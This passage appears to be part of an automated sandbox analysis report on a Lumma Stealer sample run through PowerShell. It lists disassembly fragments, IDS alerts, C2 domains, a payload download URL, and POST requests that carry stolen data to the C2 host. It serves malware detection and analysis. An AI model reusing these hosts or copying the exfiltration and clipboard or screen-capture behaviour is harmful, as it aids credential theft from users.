                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-000000BEh]8_2_0041C8A0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edx+0Ah]8_2_0041C8A0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-2E3D7ACEh]8_2_0041C8A0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax8_2_0041D8AC
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax8_2_0041D8AC
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_0042C09E
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-16h]8_2_00441160
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov eax, dword ptr [00446130h]8_2_00418169
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h8_2_0042B170
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax8_2_0042D17D
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax8_2_0042D116
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h8_2_004281CC
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h8_2_004289E9
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [edi], al8_2_0042B980
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h8_2_0043C990
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp edx8_2_004239B9
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [edx+eax]8_2_004239B9
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [ecx+ebx*8], 385488F2h8_2_0043CA40
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebx, byte ptr [edx]8_2_00436210
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then dec edx8_2_0043FA20
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]8_2_0042AAC0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+0Ah]8_2_0040AB40
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h8_2_00440340
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax8_2_0041C300
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then dec edx8_2_0043FB10
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then dec edx8_2_0043FB2A
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then dec edx8_2_0043FB28
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]8_2_004073D0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]8_2_004073D0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h8_2_004283D8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-6E2DD57Fh]8_2_0041EB80
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [eax+edi-74D5A7FEh]8_2_0042C465
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_0042C465
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [eax], cx8_2_0041747D
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [edx], di8_2_0041747D
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h8_2_00414CA0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then dec edx8_2_0043FD70
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+61765397h]8_2_0041B57D
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-16h]8_2_00440D20
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h8_2_00428528
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, ecx8_2_00426D2E
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [ebp+eax-46h]8_2_0043EDC1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh8_2_0043CDF0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-3ECB279Fh]8_2_0043CDF0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh8_2_0043CDF0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 7F7BECC6h8_2_0043CDF0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_0042DDFF
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edi, ecx8_2_0042A5B6
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax8_2_00422E6D
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp edx8_2_00422E6D
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [edx+eax]8_2_00422E6D
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then dec edx8_2_0043FE00
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_0042DE07
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-16h]8_2_004406F0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, ecx8_2_00429E80
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx eax, byte ptr [ebp+edi+00000090h]8_2_00402EB0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]8_2_00427740
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [eax], cx8_2_00416F52
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax8_2_0042BF13
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edi, dword ptr [esp+28h]8_2_00425F1B
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp eax8_2_00429739
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp edx8_2_004237D6
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov dword ptr [esp+20h], eax8_2_00409780

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49916 -> 104.21.84.241:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49916 -> 104.21.84.241:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49977 -> 104.21.84.241:443
                  Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49930 -> 104.21.84.241:443
                  Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49922 -> 104.21.84.241:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49922 -> 104.21.84.241:443
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: advicebedsu.click
                  Source: Malware configuration extractorURLs: screwamusresz.buzz
                  Source: Malware configuration extractorURLs: inherineau.buzz
                  Source: Malware configuration extractorURLs: scentniej.buzz
                  Source: Malware configuration extractorURLs: prisonyfork.buzz
                  Source: Malware configuration extractorURLs: rebuildeso.buzz
                  Source: Malware configuration extractorURLs: hummskitnj.buzz
                  Source: Malware configuration extractorURLs: cashfuzysao.buzz
                  Source: Malware configuration extractorURLs: appliacnesot.buzz
                  Source: global trafficHTTP traffic detected: GET /singl5.csx HTTP/1.1Host: cdn1.klipbazyxui.shopConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 104.21.84.241 104.21.84.241
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49916 -> 104.21.84.241:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49930 -> 104.21.84.241:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49940 -> 104.21.84.241:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49922 -> 104.21.84.241:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49956 -> 104.21.84.241:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49947 -> 104.21.84.241:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49965 -> 104.21.84.241:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49977 -> 104.21.84.241:443
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: advicebedsu.click
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 48Host: advicebedsu.click
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BXOEAC8LGUS0U8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18140Host: advicebedsu.click
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GV7D45M6XOHU3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8755Host: advicebedsu.click
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DAE0IDGYHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20384Host: advicebedsu.click
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LTCEQR1V02DCUIQE3XSUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1259Host: advicebedsu.click
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=MXLJWJKRJMSEZ522User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 570957Host: advicebedsu.click
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 83Host: advicebedsu.click
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /singl5.csx HTTP/1.1Host: cdn1.klipbazyxui.shopConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: cdn1.klipbazyxui.shop
                  Source: global trafficDNS traffic detected: DNS query: advicebedsu.click
                  Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: advicebedsu.click
                  Source: powershell.exe, 00000000.00000002.1807008792.0000016DE0804000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1807008792.0000016DE0947000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2537626425.0000000005A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000002.00000002.2537626425.0000000004B67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2616078952.0000000007180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000000.00000002.1782702388.0000016DD0791000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2537626425.0000000004A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000002.00000002.2537626425.0000000004B67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2616078952.0000000007180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000000.00000002.1811314226.0000016DE8922000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.$
                  Source: powershell.exe, 00000000.00000002.1812415946.0000016DE89F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co-
                  Source: powershell.exe, 00000008.00000002.2635830173.00000000030F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://advicebedsu.click/
                  Source: powershell.exe, 00000008.00000002.2635830173.00000000030F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://advicebedsu.click/XUr
                  Source: powershell.exe, 00000008.00000002.2635830173.00000000030F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2635830173.00000000030E9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2633114961.0000000003066000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://advicebedsu.click/api
                  Source: powershell.exe, 00000008.00000002.2635830173.00000000030F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://advicebedsu.click/api8
                  Source: powershell.exe, 00000008.00000002.2633114961.0000000003066000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://advicebedsu.click/pi
                  Source: powershell.exe, 00000008.00000002.2633114961.0000000003072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://advicebedsu.click:443/api
                  Source: powershell.exe, 00000008.00000002.2633114961.0000000003072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://advicebedsu.click:443/apiz
                  Source: powershell.exe, 00000000.00000002.1782702388.0000016DD0791000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 00000002.00000002.2537626425.0000000004A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBfq
                  Source: powershell.exe, 00000002.00000002.2537626425.0000000004B67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn1.klipbazyxui.shop
                  Source: powershell.exe, 00000002.00000002.2616078952.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2534544609.0000000002B50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn1.klipbazyxui.shop/singl5.csx
                  Source: powershell.exe, 00000002.00000002.2537626425.0000000005A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000002.00000002.2537626425.0000000005A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000002.00000002.2537626425.0000000005A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 00000002.00000002.2537626425.0000000004B67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2616078952.0000000007180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000002.00000002.2614845846.0000000006EF0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                  Source: powershell.exe, 00000002.00000002.2614845846.0000000006EF0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                  Source: powershell.exe, 00000002.00000002.2614845846.0000000006EF0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                  Source: powershell.exe, 00000000.00000002.1807008792.0000016DE0804000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1807008792.0000016DE0947000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2537626425.0000000005A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: powershell.exe, 00000002.00000002.2614845846.0000000006EF0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                  Source: powershell.exe, 00000002.00000002.2614845846.0000000006EF0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                  Source: powershell.exe, 00000002.00000002.2614845846.0000000006EF0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
                  Source: unknownHTTPS traffic detected: 104.21.72.190:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.84.241:443 -> 192.168.2.4:49916 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.84.241:443 -> 192.168.2.4:49922 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.84.241:443 -> 192.168.2.4:49930 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.84.241:443 -> 192.168.2.4:49940 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.84.241:443 -> 192.168.2.4:49947 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.84.241:443 -> 192.168.2.4:49956 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.84.241:443 -> 192.168.2.4:49965 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.84.241:443 -> 192.168.2.4:49977 version: TLS 1.2
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00433E30 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,8_2_00433E30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00433E30 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,8_2_00433E30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004348C2 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,8_2_004348C2

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: Process Memory Space: powershell.exe PID: 7432, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 7792, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B7DAEE20_2_00007FFD9B7DAEE2
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B7DA1360_2_00007FFD9B7DA136
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B7D211D0_2_00007FFD9B7D211D
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B8A38D40_2_00007FFD9B8A38D4
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0455C7502_2_0455C750
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06D0CC2B2_2_06D0CC2B
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06D056102_2_06D05610
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06D056002_2_06D05600
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06D0B2B92_2_06D0B2B9
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06D050802_2_06D05080
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06D050702_2_06D05070
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06D08F802_2_06D08F80
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06D08F732_2_06D08F73
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06D19EB82_2_06D19EB8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06D184102_2_06D18410
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06D184202_2_06D18420
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06D122982_2_06D12298
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06D122672_2_06D12267
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06D100402_2_06D10040
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06D1001F2_2_06D1001F
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06D19EA82_2_06D19EA8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06D3E45A2_2_06D3E45A
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06D3E4682_2_06D3E468
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06D368B82_2_06D368B8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06D3E83B2_2_06D3E83B
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06F4C2502_2_06F4C250
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06F47ED02_2_06F47ED0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06F48F302_2_06F48F30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06F48F222_2_06F48F22
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06F457022_2_06F45702
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06F4C5872_2_06F4C587
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06F4D8682_2_06F4D868
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06F400402_2_06F40040
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06F400072_2_06F40007
